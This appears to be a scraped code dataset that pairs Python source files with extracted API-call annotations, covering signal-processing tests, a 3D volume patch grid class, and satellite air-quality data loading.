(['(~g_pwr_mask)'], {}), '(~g_pwr_mask)\n', (6994, 7007), True, 'import numpy as np\n'), ((9046, 9069), 'numpy.sqrt', 'np.sqrt', (['g_psds', 'g_psds'], {}), '(g_psds, g_psds)\n', (9053, 9069), True, 'import numpy as np\n'), ((10392, 10432), 'ecoglib.vis.colormaps.nancmap', 'nancmap', (['cmap'], {'nanc': '(0.5, 0.5, 0.5, 0.5)'}), '(cmap, nanc=(0.5, 0.5, 0.5, 0.5))\n', (10399, 10432), False, 'from ecoglib.vis.colormaps import nancmap\n'), ((11134, 11167), 'numpy.reshape', 'np.reshape', (['centered_rxx', '(-1, x)'], {}), '(centered_rxx, (-1, x))\n', (11144, 11167), True, 'import numpy as np\n'), ((12935, 12958), 'numpy.triu_indices', 'np.triu_indices', (['n'], {'k': '(1)'}), '(n, k=1)\n', (12950, 12958), True, 'import numpy as np\n'), ((13289, 13339), 'numpy.ceil', 'np.ceil', (['(10 * (pitch_x ** 2 + pitch_y ** 2) ** 0.5)'], {}), '(10 * (pitch_x ** 2 + pitch_y ** 2) ** 0.5)\n', (13296, 13339), True, 'import numpy as np\n'), ((14829, 14876), 'ecoglib.estimation.spatial_variance.make_matern_label', 'make_matern_label', ([], {'theta': "p['theta']", 'nu': "p['nu']"}), "(theta=p['theta'], nu=p['nu'])\n", (14846, 14876), False, 'from ecoglib.estimation.spatial_variance import covar_to_iqr_lines, matern_semivariogram, make_matern_label, plot_electrode_graph\n'), ((14893, 14922), 'ecoglib.estimation.spatial_variance.matern_semivariogram', 'matern_semivariogram', (['xm'], {}), '(xm, **p)\n', (14913, 14922), False, 'from ecoglib.estimation.spatial_variance import covar_to_iqr_lines, matern_semivariogram, make_matern_label, plot_electrode_graph\n'), ((16072, 16095), 'numpy.triu_indices', 'np.triu_indices', (['n'], {'k': '(1)'}), '(n, k=1)\n', (16087, 16095), True, 'import numpy as np\n'), ((20628, 20660), 'numpy.percentile', 'np.percentile', (['vals', '[5.0, 95.0]'], {}), '(vals, [5.0, 95.0])\n', (20641, 20660), True, 'import numpy as np\n'), ((21445, 21477), 'numpy.percentile', 'np.percentile', (['vals', '[5.0, 95.0]'], {}), '(vals, [5.0, 95.0])\n', (21458, 21477), True, 'import numpy as np\n'), ((22265, 22292), 'numpy.percentile', 'np.percentile', (['cxx', '[2, 98]'], {}), '(cxx, [2, 98])\n', (22278, 22292), True, 'import numpy as np\n'), ((22375, 22435), 'ecoglib.vis.colormaps.diverging_cm', 'cmaps.diverging_cm', (['clim[0]', 'clim[1]', '((0, 0, 0), (1, 0, 0))'], {}), '(clim[0], clim[1], ((0, 0, 0), (1, 0, 0)))\n', (22393, 22435), True, 'import ecoglib.vis.colormaps as cmaps\n'), ((23773, 23786), 'numpy.sum', 'np.sum', (['(~mask)'], {}), '(~mask)\n', (23779, 23786), True, 'import numpy as np\n'), ((24074, 24100), 'numpy.ones', 'np.ones', (['chan_map.geometry'], {}), '(chan_map.geometry)\n', (24081, 24100), True, 'import numpy as np\n'), ((24915, 24932), 'numpy.dot', 'np.dot', (['data', 'ref'], {}), '(data, ref)\n', (24921, 24932), True, 'import numpy as np\n'), ((24935, 24951), 'numpy.dot', 'np.dot', (['ref', 'ref'], {}), '(ref, ref)\n', (24941, 24951), True, 'import numpy as np\n'), ((1638, 1666), 'ecogdata.util.get_default_args', 'get_default_args', (['fenced_out'], {}), '(fenced_out)\n', (1654, 1666), False, 'from ecogdata.util import get_default_args\n'), ((2283, 2303), 'numpy.sqrt', 'np.sqrt', (['df_band_pwr'], {}), '(df_band_pwr)\n', (2290, 2303), True, 'import numpy as np\n'), ((2917, 2938), 'ecogdata.devices.units.nice_unit_text', 'nice_unit_text', (['units'], {}), '(units)\n', (2931, 2938), False, 'from ecogdata.devices.units import nice_unit_text\n'), ((4736, 4764), 'ecogdata.util.get_default_args', 'get_default_args', (['fenced_out'], {}), '(fenced_out)\n', (4752, 4764), False, 'from ecogdata.util import get_default_args\n'), ((6052, 6061), 'numpy.exp', 'np.exp', (['y'], {}), '(y)\n', (6058, 6061), True, 'import numpy as np\n'), ((6331, 6347), 'numpy.array', 'np.array', (['[True]'], {}), '([True])\n', (6339, 6347), True, 'import numpy as np\n'), ((7541, 7562), 'ecogdata.devices.units.nice_unit_text', 'nice_unit_text', (['units'], {}), '(units)\n', (7555, 7562), False, 'from ecogdata.devices.units import nice_unit_text\n'), ((8193, 8210), 'numpy.any', 'np.any', (['offscreen'], {}), '(offscreen)\n', (8199, 8210), True, 'import numpy as np\n'), ((10052, 10064), 'numpy.arange', 'np.arange', (['x'], {}), '(x)\n', (10061, 10064), True, 'import numpy as np\n'), ((10115, 10127), 'numpy.arange', 'np.arange', (['y'], {}), '(y)\n', (10124, 10127), True, 'import numpy as np\n'), ((10256, 10274), 'numpy.random.rand', 'np.random.rand', (['(50)'], {}), '(50)\n', (10270, 10274), True, 'import numpy as np\n'), ((10276, 10294), 'numpy.random.rand', 'np.random.rand', (['(50)'], {}), '(50)\n', (10290, 10294), True, 'import numpy as np\n'), ((10615, 10647), 'numpy.nanmean', 'np.nanmean', (['centered_rxx'], {'axis': '(0)'}), '(centered_rxx, axis=0)\n', (10625, 10647), True, 'import numpy as np\n'), ((11599, 11620), 'numpy.linspace', 'np.linspace', (['(-1)', '(1)', '(6)'], {}), '(-1, 1, 6)\n', (11610, 11620), True, 'import numpy as np\n'), ((12414, 12435), 'numpy.linspace', 'np.linspace', (['(-1)', '(1)', '(6)'], {}), '(-1, 1, 6)\n', (12425, 12435), True, 'import numpy as np\n'), ((13620, 13631), 'numpy.mean', 'np.mean', (['yb'], {}), '(yb)\n', (13627, 13631), True, 'import numpy as np\n'), ((20488, 20504), 'numpy.isfinite', 'np.isfinite', (['rms'], {}), '(rms)\n', (20499, 20504), True, 'import numpy as np\n'), ((20717, 20731), 'numpy.nanmin', 'np.nanmin', (['rms'], {}), '(rms)\n', (20726, 20731), True, 'import numpy as np\n'), ((20733, 20747), 'numpy.nanmax', 'np.nanmax', (['rms'], {}), '(rms)\n', (20742, 20747), True, 'import numpy as np\n'), ((20949, 20970), 'ecogdata.devices.units.nice_unit_text', 'nice_unit_text', (['units'], {}), '(units)\n', (20963, 20970), False, 'from ecogdata.devices.units import nice_unit_text\n'), ((21305, 21321), 'numpy.isfinite', 'np.isfinite', (['rms'], {}), '(rms)\n', (21316, 21321), True, 'import numpy as np\n'), ((21534, 21548), 'numpy.nanmin', 'np.nanmin', (['rms'], {}), '(rms)\n', (21543, 21548), True, 'import numpy as np\n'), ((21550, 21564), 'numpy.nanmax', 'np.nanmax', (['rms'], {}), '(rms)\n', (21559, 21564), True, 'import numpy as np\n'), ((21857, 21878), 'ecogdata.devices.units.nice_unit_text', 'nice_unit_text', (['units'], {}), '(units)\n', (21871, 21878), False, 'from ecogdata.devices.units import nice_unit_text\n'), ((25074, 25088), 'numpy.log10', 'np.log10', (['gain'], {}), '(gain)\n', (25082, 25088), True, 'import numpy as np\n'), ((2754, 2774), 'numpy.sqrt', 'np.sqrt', (['gf_band_pwr'], {}), '(gf_band_pwr)\n', (2761, 2774), True, 'import numpy as np\n'), ((6008, 6028), 'numpy.log', 'np.log', (['sig_baseline'], {}), '(sig_baseline)\n', (6014, 6028), True, 'import numpy as np\n'), ((6258, 6271), 'numpy.log', 'np.log', (['g_pwr'], {}), '(g_pwr)\n', (6264, 6271), True, 'import numpy as np\n'), ((10547, 10583), 'numpy.percentile', 'np.percentile', (['centered_rxx', '[2, 98]'], {}), '(centered_rxx, [2, 98])\n', (10560, 10583), True, 'import numpy as np\n'), ((11239, 11250), 'numpy.isnan', 'np.isnan', (['c'], {}), '(c)\n', (11247, 11250), True, 'import numpy as np\n'), ((12030, 12041), 'numpy.isnan', 'np.isnan', (['c'], {}), '(c)\n', (12038, 12041), True, 'import numpy as np\n'), ((23952, 23973), 'ecogdata.devices.units.nice_unit_text', 'nice_unit_text', (['units'], {}), '(units)\n', (23966, 23973), False, 'from ecogdata.devices.units import nice_unit_text\n'), ((7064, 7087), 'numpy.exp', 'np.exp', (['gf[~g_pwr_mask]'], {}), '(gf[~g_pwr_mask])\n', (7070, 7087), True, 'import numpy as np\n'), ((11307, 11344), 'numpy.percentile', 'np.percentile', (['c[valid]', '[25, 50, 75]'], {}), '(c[valid], [25, 50, 75])\n', (11320, 11344), True, 'import numpy as np\n'), ((11914, 11942), 'numpy.rollaxis', 'np.rollaxis', (['centered_rxx', '(2)'], {}), '(centered_rxx, 2)\n', (11925, 11942), True, 'import numpy as np\n'), ((12098, 12135), 'numpy.percentile', 'np.percentile', (['c[valid]', '[25, 50, 75]'], {}), '(c[valid], [25, 50, 75])\n', (12111, 12135), True, 'import numpy as np\n'), ((20591, 20606), 'numpy.median', 'np.median', (['vals'], {}), '(vals)\n', (20600, 20606), True, 'import numpy as np\n'), ((21408, 21423), 'numpy.median', 'np.median', (['vals'], {}), '(vals)\n', (21417, 21423), True, 'import numpy as np\n'), ((23518, 23543), 'numpy.ma.masked_invalid', 'np.ma.masked_invalid', (['rms'], {}), '(rms)\n', (23538, 23543), True, 'import numpy as np\n'), ((23816, 23829), 'numpy.sum', 'np.sum', (['(~mask)'], {}), '(~mask)\n', (23822, 23829), True, 'import numpy as np\n')] |
"""
Copyright 2019 <NAME> (Johns Hopkins University)
Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""
import pytest
import numpy as np
from numpy.testing import assert_allclose
from hyperion.hyp_defs import float_cpu
from hyperion.feats.stft import *
from hyperion.feats.feature_windows import FeatureWindowFactory as FWF
margin = 10
def generate_signal():
fs = 16000
rng = np.random.RandomState(seed=1024)
s = (2 ** 10) * rng.randn(fs * 10).astype(float_cpu(), copy=False)
return s
s = generate_signal()
def test_stft_hanning_half():
w = FWF.create("hanning", 512)
X = stft(s, frame_length=512, frame_shift=256, fft_length=512, window=w)
shat = np.real(istft(X, frame_length=512, frame_shift=256, window=w))
s_ref = s[margin : shat.shape[0] - margin]
shat = shat[margin:-margin]
assert_allclose(s_ref, shat, rtol=1e-3, atol=1e-1)
def test_strft_hanning_half():
w = FWF.create("hanning", 512)
X = strft(s, frame_length=512, frame_shift=256, fft_length=512, window=w)
shat = istrft(X, frame_length=512, frame_shift=256, window=w)
s_ref = s[margin : shat.shape[0] - margin]
shat = shat[margin:-margin]
assert_allclose(s_ref, shat, rtol=1e-3, atol=1e-1)
def test_stft_povey_10hz():
w = FWF.create("povey", 400)
X = stft(s, frame_length=400, frame_shift=160, fft_length=512, window=w)
shat = np.real(istft(X, frame_length=400, frame_shift=160, window=w))
s_ref = s[margin : shat.shape[0] - margin]
shat = shat[margin:-margin]
assert_allclose(s_ref, shat, rtol=1e-4, atol=1e-2)
def test_strft_povey_10hz():
w = FWF.create("povey", 400)
X = strft(s, frame_length=400, frame_shift=160, fft_length=512, window=w)
shat = istrft(X, frame_length=400, frame_shift=160, window=w)
s_ref = s[margin : shat.shape[0] - margin]
shat = shat[margin:-margin]
assert_allclose(s_ref, shat, rtol=1e-4, atol=1e-2)
| [
"hyperion.hyp_defs.float_cpu",
"numpy.testing.assert_allclose",
"hyperion.feats.feature_windows.FeatureWindowFactory.create",
"numpy.random.RandomState"
] | [((402, 434), 'numpy.random.RandomState', 'np.random.RandomState', ([], {'seed': '(1024)'}), '(seed=1024)\n', (423, 434), True, 'import numpy as np\n'), ((584, 610), 'hyperion.feats.feature_windows.FeatureWindowFactory.create', 'FWF.create', (['"""hanning"""', '(512)'], {}), "('hanning', 512)\n", (594, 610), True, 'from hyperion.feats.feature_windows import FeatureWindowFactory as FWF\n'), ((847, 897), 'numpy.testing.assert_allclose', 'assert_allclose', (['s_ref', 'shat'], {'rtol': '(0.001)', 'atol': '(0.1)'}), '(s_ref, shat, rtol=0.001, atol=0.1)\n', (862, 897), False, 'from numpy.testing import assert_allclose\n'), ((940, 966), 'hyperion.feats.feature_windows.FeatureWindowFactory.create', 'FWF.create', (['"""hanning"""', '(512)'], {}), "('hanning', 512)\n", (950, 966), True, 'from hyperion.feats.feature_windows import FeatureWindowFactory as FWF\n'), ((1196, 1246), 'numpy.testing.assert_allclose', 'assert_allclose', (['s_ref', 'shat'], {'rtol': '(0.001)', 'atol': '(0.1)'}), '(s_ref, shat, rtol=0.001, atol=0.1)\n', (1211, 1246), False, 'from numpy.testing import assert_allclose\n'), ((1286, 1310), 'hyperion.feats.feature_windows.FeatureWindowFactory.create', 'FWF.create', (['"""povey"""', '(400)'], {}), "('povey', 400)\n", (1296, 1310), True, 'from hyperion.feats.feature_windows import FeatureWindowFactory as FWF\n'), ((1547, 1599), 'numpy.testing.assert_allclose', 'assert_allclose', (['s_ref', 'shat'], {'rtol': '(0.0001)', 'atol': '(0.01)'}), '(s_ref, shat, rtol=0.0001, atol=0.01)\n', (1562, 1599), False, 'from numpy.testing import assert_allclose\n'), ((1638, 1662), 'hyperion.feats.feature_windows.FeatureWindowFactory.create', 'FWF.create', (['"""povey"""', '(400)'], {}), "('povey', 400)\n", (1648, 1662), True, 'from hyperion.feats.feature_windows import FeatureWindowFactory as FWF\n'), ((1892, 1944), 'numpy.testing.assert_allclose', 'assert_allclose', (['s_ref', 'shat'], {'rtol': '(0.0001)', 'atol': '(0.01)'}), '(s_ref, shat, rtol=0.0001, atol=0.01)\n', (1907, 1944), False, 'from numpy.testing import assert_allclose\n'), ((481, 492), 'hyperion.hyp_defs.float_cpu', 'float_cpu', ([], {}), '()\n', (490, 492), False, 'from hyperion.hyp_defs import float_cpu\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
implementation of the patches data structure
"""
import pandas as pd
import os
import glob
import numpy as np
import h5py
import cupy as cp
from multiprocessing import Pool, cpu_count
import functools
import time
from numpy.random import default_rng
import abc
import tensorflow as tf
from tensorflow.keras.layers import UpSampling3D
class Grid(dict):
def __init__(self, vol_shape, initialize_by = "grid-params", xp = np, **kwargs):
'''
A patch is the set of all pixels in a rectangle / cuboid sampled from a (big) image / volume. The Patches data structure allows the following. Think of this as a pandas DataFrame. Each row stores coordinates and features corresponding to a new patch constrained within a big volume of shape vol_shape.
1. stores coordinates and widths of the patches as arrays of shape (n_pts, z, y, x,) and (n_pts, pz, py, px) respectively.
2. extracts patches from a big volume and reconstructs a big volume from patches
3. filters, sorts and selects patches based on a feature
A Grid class is similar to Patches with the main difference that the width of all patches in a grid is equal, hence width is not stored as an array but a single integer value.
'''
self.vol_shape = vol_shape
self.xp = xp
initializers = {"data" : self._set_from_data, \
"grid-params" : self._set_regular_grid, \
"file": self._load_from_disk}
self["source"] = initialize_by
self.points, self.wd = initializers[initialize_by](**kwargs)
self['points'] = self.points
self['width'] = self.wd
return
def __len__(self):
return len(self.points)
def dump(self, fpath):
"""create df from points"""
with h5py.File(fpath, 'w') as hf:
hf.create_dataset("vol_shape", data = self.vol_shape)
hf.create_dataset("points", data = self.points)
hf.create_dataset("width", data = self.wd)
return
def _set_regular_grid(self, width = None, n_points = None):
'''
Initialize (n,3) points on the corner of volume patches placed on a grid. No overlap is used. Instead, the volume is cropped such that it is divisible by the patch_size in that dimension.
Parameters
----------
width : int
width of a unit patch volume
'''
_ndim = len(self.vol_shape)
assert not any([self.vol_shape[i]%width > 0 for i in range(_ndim)]), "vol_shape must be multiple of patch width"
# Find optimum number of patches to cover full image
m = list(self.vol_shape)
p = [width]*len(self.vol_shape)
nsteps = [int(m[i]//p[i]) for i in range(len(m))]
stepsize = tuple(p)
points = []
if len(m) == 3:
for ii in range(nsteps[0]):
for jj in range(nsteps[1]):
for kk in range(nsteps[2]):
points.append([ii*stepsize[0], jj*stepsize[1], kk*stepsize[2]])
elif len(m) == 2:
for ii in range(nsteps[0]):
for jj in range(nsteps[1]):
points.append([ii*stepsize[0], jj*stepsize[1]])
if n_points is not None:
n_points = min(n_points, len(points))
points = self.xp.asarray(points)
# sample randomly
rng = default_rng()
idxs = self.xp.sort(rng.choice(points.shape[0], n_points, replace = False))
points = points[idxs,...].copy()
return self.xp.asarray(points).astype(np.uint32), int(width)
# use this when initialize_by = "file"
def _load_from_disk(self, fpath = None):
with h5py.File(fpath, 'r') as hf:
self.vol_shape = tuple(self.xp.asarray(hf["vol_shape"]))
return self.xp.asarray(hf["points"]).astype(np.uint32), \
int(self.xp.asarray(hf["width"]))
def _set_from_data(self, points = None, width = None):
return points.astype(self.xp.uint32), int(width)
def append(self, more_patches):
'''
Append the input patches to self in place.
Parameters
----------
more_patches : Patches
additional rows of patches to be appended.
Returns
-------
None
Append in place so nothing is returned.
'''
if self.vol_shape != more_patches.vol_shape:
raise ValueError("patches data is not compatible. Ensure that big volume shapes match")
assert self.wd == more_patches.wd, "this is a Grid data structure. All widths must be equal"
self.points = self.xp.concatenate([self.points, more_patches.points], axis = 0)
return
def slices(self):
'''
Get python slice objects from the list of coordinates
Returns
-------
self.xp.ndarray (n_pts, 3)
each element of the array is a slice object
'''
_ndim = len(self.vol_shape)
s = [[slice(self.points[ii,jj], self.points[ii,jj] + self.wd) for jj in range(_ndim)] for ii in range(len(self))]
return self.xp.asarray(s)
def centers(self):
'''
Get centers of the patch volumes.
Returns
-------
self.xp.ndarray (n_pts, 3)
each element of the array is the z, y, x coordinate of the center of the patch volume.
'''
_ndim = len(self.vol_shape)
s = [[int(self.points[ii,jj] + self.wd//2) for jj in range(_ndim)] for ii in range(len(self.points))]
return self.xp.asarray(s)
def _is_within_cylindrical_crop(self, mask_ratio, height_ratio):
'''
returns a boolean array
'''
assert self.vol_shape[1] == self.vol_shape[2], "must be tomographic CT volume (ny = nx = n)"
nz, n = self.vol_shape[:2]
centers = self.centers()
radii = self.xp.sqrt(self.xp.power(centers[:,1] - n/2.0, 2) + self.xp.power(centers[:,2] - n/2.0, 2))
clist1 = radii < mask_ratio*n/2.0
heights = self.xp.abs(centers[:,0] - nz/2.0)
clist2 = heights < height_ratio*nz/2.0
cond_list = clist1&clist2
# print("CALL TO: %s"%self._is_within_cylindrical_crop.__name__)
return cond_list
def filter_by_cylindrical_mask(self, mask_ratio = 0.9, height_ratio = 1.0):
'''
Selects patches whose centers lie inside a cylindrical volume of radius = mask_ratio*nx/2. This assumes that the volume shape is a tomogram where ny = nx. The patches are filtered along the vertical (or z) axis if height_ratio < 1.0.
'''
cond_list = self._is_within_cylindrical_crop(mask_ratio, height_ratio)
return self.filter_by_condition(cond_list)
def filter_by_condition(self, cond_list):
'''
Select coordinates based on condition list. Here we use numpy.compress. The input cond_list can be from a number of classifiers.
Parameters
----------
cond_list : self.xp.ndarray
array with shape (n_pts, n_conditions). Selection will be done based on ALL conditions being met for the given patch.
'''
if cond_list.shape[0] != len(self.points):
raise ValueError("length of condition list must same as the current number of stored points")
if cond_list.ndim == 2:
cond_list = self.xp.prod(cond_list, axis = 1) # AND operator on all conditions
elif cond_list.ndim > 2:
raise ValueError("condition list must have 1 or 2 dimensions like so (n_pts,) or (n_pts, n_conditions)")
return Grid(self.vol_shape, initialize_by = "data", \
points = self.xp.compress(cond_list, self.points, axis = 0),\
width = self.wd)
def copy(self):
return Grid(self.vol_shape, initialize_by = "data", \
points = self.points.copy(),\
widths = int(self.wd))
def select_by_range(self, s_sel):
'''
Parameters
----------
s_sel : tuple
range (start, stop)
'''
s_sel = slice(s_sel[0], s_sel[1], None)
return Grid(self.vol_shape, initialize_by = "data", \
points = self.points.copy()[s_sel,...],\
width = self.wd)
def pop(self, n_pop):
'''
Parameters
----------
n_pop : int
If n_pop is negative, pop from end else pop from beginning
'''
if n_pop > 0:
spop = slice(n_pop, None, None)
elif n_pop < 0:
spop = slice(None, n_pop, None)
else:
return self.copy()
return Grid(self.vol_shape, initialize_by = "data", \
points = self.points.copy()[spop,...],\
width = self.wd)
def rescale(self, fac):
'''
'''
fac = int(fac)
new_vol_shape = tuple([int(self.vol_shape[i]*fac) for i in range(len(self.vol_shape))])
return Grid(new_vol_shape, initialize_by = "data", \
points = self.points.copy()*fac,\
width = int(self.wd*fac))
def select_by_indices(self, idxs):
'''
Select patches corresponding to the input list of indices.
Parameters
----------
idxs : list
list of integers as indices.
'''
return Grid(self.vol_shape, initialize_by = "data", \
points = self.points[idxs].copy(),\
width = self.wd)
def select_random_sample(self, n_points):
'''
Select a given number of patches randomly without replacement.
Parameters
----------
n_points : list
list of integers as indices.
'''
rng = default_rng()
idxs = self.xp.sort(rng.choice(self.points.shape[0], n_points, replace = False))
return self.select_by_indices(idxs)
def sort_by(self, feature):
'''
Sort patches list in ascending order of the value of a feature.
Parameters
----------
feature : self.xp.ndarray
array with shape (n_pts,). If provided separately, ife will be ignored.
'''
assert feature.ndim == 1, "feature must be 1D array"
assert len(feature) == len(self.points), "length mismatch"
idxs = self.xp.argsort(feature)
return self.select_by_indices(idxs)
def extract(self, vol):
'''
Returns a list of volume patches at the active list of coordinates by drawing from the given big volume 'vol'
Returns
-------
self.xp.ndarray
shape is (n_pts, wd, wd, wd)
'''
xp = cp.get_array_module(vol)
assert vol.shape == self.vol_shape, "Shape of big volume does not match vol_shape attribute of patches data"
# make a list of patches
x = []
for ii in range(len(self)):
s = (slice(self.points[ii,0], self.points[ii,0] + self.wd),\
slice(self.points[ii,1], self.points[ii,1] + self.wd),\
slice(self.points[ii,2], self.points[ii,2] + self.wd))
# x[ii,...] = vol[s]
x.append(vol[s])
x = xp.array(x)
return x
def fill_patches_in_volume(self, sub_vols, vol_out):
'''
fill patches in volume or image (3d or 2d patches)
'''
s = self.slices()
for idx in range(len(self)):
vol_out[tuple(s[idx,...])] = sub_vols[idx]
return
if __name__ == "__main__":
print('just a bunch of functions')
| [
"numpy.random.default_rng",
"h5py.File",
"cupy.get_array_module"
] | [((10416, 10429), 'numpy.random.default_rng', 'default_rng', ([], {}), '()\n', (10427, 10429), False, 'from numpy.random import default_rng\n'), ((11412, 11436), 'cupy.get_array_module', 'cp.get_array_module', (['vol'], {}), '(vol)\n', (11431, 11436), True, 'import cupy as cp\n'), ((1890, 1911), 'h5py.File', 'h5py.File', (['fpath', '"""w"""'], {}), "(fpath, 'w')\n", (1899, 1911), False, 'import h5py\n'), ((3560, 3573), 'numpy.random.default_rng', 'default_rng', ([], {}), '()\n', (3571, 3573), False, 'from numpy.random import default_rng\n'), ((3897, 3918), 'h5py.File', 'h5py.File', (['fpath', '"""r"""'], {}), "(fpath, 'r')\n", (3906, 3918), False, 'import h5py\n')] |
import os
import tqdm
import pickle
import numpy as np
import pandas as pd
import geopandas as gpd
# Imports from eo-learn and sentinelhub-py
from eolearn.core import EOPatch, EOTask, LinearWorkflow, FeatureType
from sentinelhub import bbox_to_dimensions
from lib.utils import _get_point
from lib.data_utils import (get_era5_data,
get_modis_data,
get_elevation_data,
get_land_cover_data,
get_sen3_data,
get_s5p_data,
get_cams_data)
from algorithms.ensemble import get_feature_matrix_dict
def add_cams_col(gts, cams_eop):
COORD_TO_GRID = {}
dates = np.array(cams_eop.meta_info['day'])
for i, (date, lat, lon) in enumerate(gts[["Date", "SITE_LATIT", "SITE_LONGI"]].values):
if (lat, lon) not in COORD_TO_GRID:
p = _get_point(lat, lon, cams_eop.data["PM2_5"][0], cams_eop.bbox)
COORD_TO_GRID[(lat, lon)] = p
p = COORD_TO_GRID[(lat, lon)]
mask = date == dates
pm25 = cams_eop.data["PM2_5"][mask][:, p[0], p[1]]
no2_surface = cams_eop.data["NO2_surface"][mask][:, p[0], p[1]]
gts.loc[gts.index == i, "PM2_5"] = pm25.mean()
gts.loc[gts.index == i, "NO2_surface"] = no2_surface.mean()
def filter_gt(pm25_gt, cams_eop):
add_cams_col(pm25_gt, cams_eop)
pm25_gt.loc[pm25_gt.PM2_5 > 115, "PM2_5"] = 115
v1 = pm25_gt.PM2_5
v2 = pm25_gt.AirQuality
mask = ((abs(v2 - v1) > v2 * 0.7) & ((v2 > 5) | (v1 > 5)))
pm25_gt = pm25_gt.loc[~mask]
return pm25_gt
def get_day_eop(eop, date):
mask = eop.meta_info["day"] == date
if not mask.any():
return None
out_eop = EOPatch(data={k: v[mask].mean(0, keepdims=True) for k, v in eop.data.items()},
meta_info={"date": date},
bbox=eop.bbox,
)
return out_eop
def save_pickle(obj, path):
os.makedirs(os.path.dirname(path), exist_ok=True)
with open(path, "wb") as f:
pickle.dump(obj, f)
def load_pickle(path):
with open(path, "rb") as f:
obj = pickle.load(f)
return obj
def get_data(indir, outdir, label, aoi, feature_keys, update=False):
# Data
dir = indir/"ground_air_quality" / ("NO2" if label == "NO2" else "PM25")
gt_path = dir / (os.listdir(dir)[0][:-3] + 'shp')
gts = gpd.read_file(gt_path)
path = outdir / ("data_" + aoi + ".pkl")
if os.path.isfile(path) and not update:
data = load_pickle(path)
else:
data = {"land_cover": get_land_cover_data(indir/("corine" if aoi == "Italy" else ""), outdir),
"era5": get_era5_data(indir/"era5", outdir),
"cams": get_cams_data(indir/"CAMS", outdir),
"modis": get_modis_data(indir/"modis_MCD19A2", outdir),
"s5p": get_s5p_data(indir/'sentinel5P', outdir),
"elevation": get_elevation_data(indir, outdir)}
if aoi != "South_Africa":
data["s3_eop"] = get_sen3_data(indir/"SEN3", outdir)
save_pickle(data, path)
# -----------
# Day data
day_data = {"data": [],
"date": []}
for date in tqdm.tqdm(gts.Date.unique()):
_day_data = {
"land_cover": data["land_cover"],
"elevation": data["elevation"],
"era5": get_day_eop(data["era5"], date),
"modis": get_day_eop(data["modis"], date),
# "s3": get_day_eop(data["s3"], date),
}
if label == "NO2":
_day_data["s5p"] = get_day_eop(data["s5p"], date)
if _day_data["s5p"] is None:
continue
else:
_day_data["cams"] = get_day_eop(data["cams"], date)
if np.any([v is None for v in _day_data.values()]):
print('Missing datapoint at date:', date, "datasets:", [k for k, v in _day_data.items() if v is None])
continue
assert np.all([v is not None for v in _day_data.values()])
day_data["data"].append(_day_data)
day_data["date"].append(date)
# ------------------
# Target size
if label == "NO2":
target_resolution = 1000
in_eop = day_data["data"][0]["s5p"]
else:
target_resolution = 1000 if aoi == "Italy" else 10_000
in_eop = day_data["data"][0]["cams"]
target_size = bbox_to_dimensions(in_eop.bbox, target_resolution)[::-1]
# -----------------
day_data["feat_dicts"] = []
day_data["feats"] = []
for i in range(len(day_data["data"])):
feat_dict = get_feature_matrix_dict(
day_data["data"][i], target_size, label, verbose=False)
day_data["feat_dicts"].append(feat_dict)
feats = np.stack([feat_dict[k] for k in feature_keys], axis=-1)
day_data["feats"].append(feats)
return day_data, gts, target_size
| [
"numpy.stack",
"pickle.dump",
"sentinelhub.bbox_to_dimensions",
"lib.data_utils.get_sen3_data",
"os.path.dirname",
"lib.data_utils.get_cams_data",
"lib.data_utils.get_s5p_data",
"lib.data_utils.get_modis_data",
"lib.data_utils.get_era5_data",
"lib.data_utils.get_land_cover_data",
"os.path.isfile... | [((727, 762), 'numpy.array', 'np.array', (["cams_eop.meta_info['day']"], {}), "(cams_eop.meta_info['day'])\n", (735, 762), True, 'import numpy as np\n'), ((2439, 2461), 'geopandas.read_file', 'gpd.read_file', (['gt_path'], {}), '(gt_path)\n', (2452, 2461), True, 'import geopandas as gpd\n'), ((2017, 2038), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (2032, 2038), False, 'import os\n'), ((2095, 2114), 'pickle.dump', 'pickle.dump', (['obj', 'f'], {}), '(obj, f)\n', (2106, 2114), False, 'import pickle\n'), ((2186, 2200), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (2197, 2200), False, 'import pickle\n'), ((2515, 2535), 'os.path.isfile', 'os.path.isfile', (['path'], {}), '(path)\n', (2529, 2535), False, 'import os\n'), ((4431, 4481), 'sentinelhub.bbox_to_dimensions', 'bbox_to_dimensions', (['in_eop.bbox', 'target_resolution'], {}), '(in_eop.bbox, target_resolution)\n', (4449, 4481), False, 'from sentinelhub import bbox_to_dimensions\n'), ((4635, 4714), 'algorithms.ensemble.get_feature_matrix_dict', 'get_feature_matrix_dict', (["day_data['data'][i]", 'target_size', 'label'], {'verbose': '(False)'}), "(day_data['data'][i], target_size, label, verbose=False)\n", (4658, 4714), False, 'from algorithms.ensemble import get_feature_matrix_dict\n'), ((4794, 4849), 'numpy.stack', 'np.stack', (['[feat_dict[k] for k in feature_keys]'], {'axis': '(-1)'}), '([feat_dict[k] for k in feature_keys], axis=-1)\n', (4802, 4849), True, 'import numpy as np\n'), ((916, 978), 'lib.utils._get_point', '_get_point', (['lat', 'lon', "cams_eop.data['PM2_5'][0]", 'cams_eop.bbox'], {}), "(lat, lon, cams_eop.data['PM2_5'][0], cams_eop.bbox)\n", (926, 978), False, 'from lib.utils import _get_point\n'), ((2625, 2698), 'lib.data_utils.get_land_cover_data', 'get_land_cover_data', (["(indir / ('corine' if aoi == 'Italy' else ''))", 'outdir'], {}), "(indir / ('corine' if aoi == 'Italy' else ''), outdir)\n", (2644, 2698), False, 'from lib.data_utils import get_era5_data, get_modis_data, get_elevation_data, get_land_cover_data, get_sen3_data, get_s5p_data, get_cams_data\n'), ((2722, 2759), 'lib.data_utils.get_era5_data', 'get_era5_data', (["(indir / 'era5')", 'outdir'], {}), "(indir / 'era5', outdir)\n", (2735, 2759), False, 'from lib.data_utils import get_era5_data, get_modis_data, get_elevation_data, get_land_cover_data, get_sen3_data, get_s5p_data, get_cams_data\n'), ((2783, 2820), 'lib.data_utils.get_cams_data', 'get_cams_data', (["(indir / 'CAMS')", 'outdir'], {}), "(indir / 'CAMS', outdir)\n", (2796, 2820), False, 'from lib.data_utils import get_era5_data, get_modis_data, get_elevation_data, get_land_cover_data, get_sen3_data, get_s5p_data, get_cams_data\n'), ((2845, 2892), 'lib.data_utils.get_modis_data', 'get_modis_data', (["(indir / 'modis_MCD19A2')", 'outdir'], {}), "(indir / 'modis_MCD19A2', outdir)\n", (2859, 2892), False, 'from lib.data_utils import get_era5_data, 